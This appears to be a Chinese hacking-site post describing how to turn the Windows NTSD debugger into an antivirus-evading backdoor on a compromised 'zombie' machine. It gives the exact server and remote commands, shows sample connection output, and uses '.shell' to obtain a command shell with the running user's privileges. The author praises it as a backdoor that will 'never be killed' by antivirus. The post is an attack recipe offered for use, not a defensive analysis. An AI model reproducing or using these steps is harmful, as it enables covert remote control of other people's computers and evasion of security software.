1.肉雞上運(yùn)行：ntsd -server tcp:port=端口 要調(diào)試的程序（可以任意，只要存在即可），例如：ntsd -server tcp:port=99 calc.exe，會(huì)新彈出個(gè)窗口，并監(jiān)聽剛才設(shè)置端口。

2.本機(jī)運(yùn)行：ntsd -remote tcp:server=IP,port=端口，例如：ntsd -remote tcp:server=192.168.1.1,port=99。會(huì)彈出一個(gè)窗口。如果參數(shù)填寫正確的話，會(huì)連接上目標(biāo)機(jī)器，會(huì)顯示命令類似提示符的界面，同時(shí) server 端（就是第一步監(jiān)聽的那個(gè)）會(huì)顯示：0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011，表示有人連接了，同時(shí)還顯示連接的機(jī)器名，用戶名，連接類型，IP地址，端口，時(shí)間等信息。

3.輸入：.shell，取得 shell，操作和 Cmd 完全一樣，權(quán)限是服務(wù)端運(yùn)行ntsd.exe的用戶權(quán)限。

又是個(gè)留后門的好方法，全免殺，而且永不被殺……

這個(gè)其實(shí)是 NTSD.exe 的正常功能，遠(yuǎn)程調(diào)試功能，更多說明自己谷歌搜索，這是一個(gè) windows 命令行下的調(diào)試工具，功能十分強(qiáng)大。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。